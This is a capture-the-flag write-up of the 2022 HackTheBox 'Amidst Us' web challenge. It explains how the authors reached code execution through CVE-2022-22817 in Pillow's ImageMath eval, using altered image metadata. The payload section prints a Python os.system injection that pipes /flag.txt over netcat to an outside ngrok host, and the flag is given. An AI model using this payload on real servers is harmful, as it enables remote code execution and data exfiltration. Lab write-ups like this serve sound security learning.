Amidst Us — HTB Cyber Apocalypse CTF 2022
Summary:
Amidst Us was an easy, white box web challenge from the 2022 HacktheBox Cyber Apocalypse CTF. My team retrieved the flag by exploiting a vulnerability in the Pillow 8.4.0 library via command injection.
You wouldn’t download and run an application from a sketchy website would you? Well, we’re gonna get this web page to do something similar.
Challenge Description:
Taken directly from the website — “The AmidstUs tribe is a notorious group of sleeper agents for hire. We have plausible reasons to believe they are working with Draeger, so we have to take action to uncover their identities. Ulysses and bonnie have infiltrated their HQ and came across this mysterious portal on one of the unlocked computers. Can you hack into it despite the low visibility and get them access?”
Initial Reconnaissance:
We check the website for user interaction.
If we click the fluorescent UFO it prompts us to upload a file, and if we upload a picture it replaces a character on the external web page with whatever we upload.
Next, let’s check the source code.
Pillow is a Python library with some major vulnerabilities that were fixed in release 9.0.1, any earlier versions will still be vulnerable. We check for known CVEs related to the Pillow library version running on the web page and discover CVE-2022–22817 which suggests we can run our own code with a method from the ImageMath module. If we can execute a command then we can get the web page to do anything we want!
Let’s see if we can inject a command by uploading a picture with altered metadata, we can use exiftool. Metadata is simply data relating to other data, which is useful for organizing the parent data. Photos have many different potential data points, including, but not limited to: file name, time and date the photo was taken, time and date the photo was modified, etc. These data points are called “meta tags” or just tags.
Proof of Concept:
We will put a proxy server between us and the web page to capture any network traffic we send or receive. Burp Suite will work great for this, we can see how the web page responds to our altered photo. We changed the filename (after making a copy), because the other tags don’t work (e.g. require floating point numbers). We upload our altered pic to the web page and capture the response (the webpage is updating because of our upload).
The first ‘255’ has been replaced.
The user-uploaded image is encoded to base64, then decoded and used by our method, .eval(), to be placed on the web page. The details here aren’t really important, any uploaded picture is processed on the backend and posted to the external web page for all the world to see. One of the processes used to alter the picture is susceptible to the vulnerability we researched earlier.
Payload Crafting:
We can use netcat to send the content of the flag.txt file to an external server, we simply direct the output of the flag located in the root directory to an ngrok server. The server will host the content until we are ready to retrieve it:
“__import__(‘os’).system(‘cat /flag.txt | nc <url>.ngrok.io <port>’)”
Flag:
HTB{i_slept_my_way_to_rce}
Conclusion:
The path itself was straightforward but it took quite a bit of troubleshooting to get right. Overall, a really satisfying challenge. Thanks for reading!
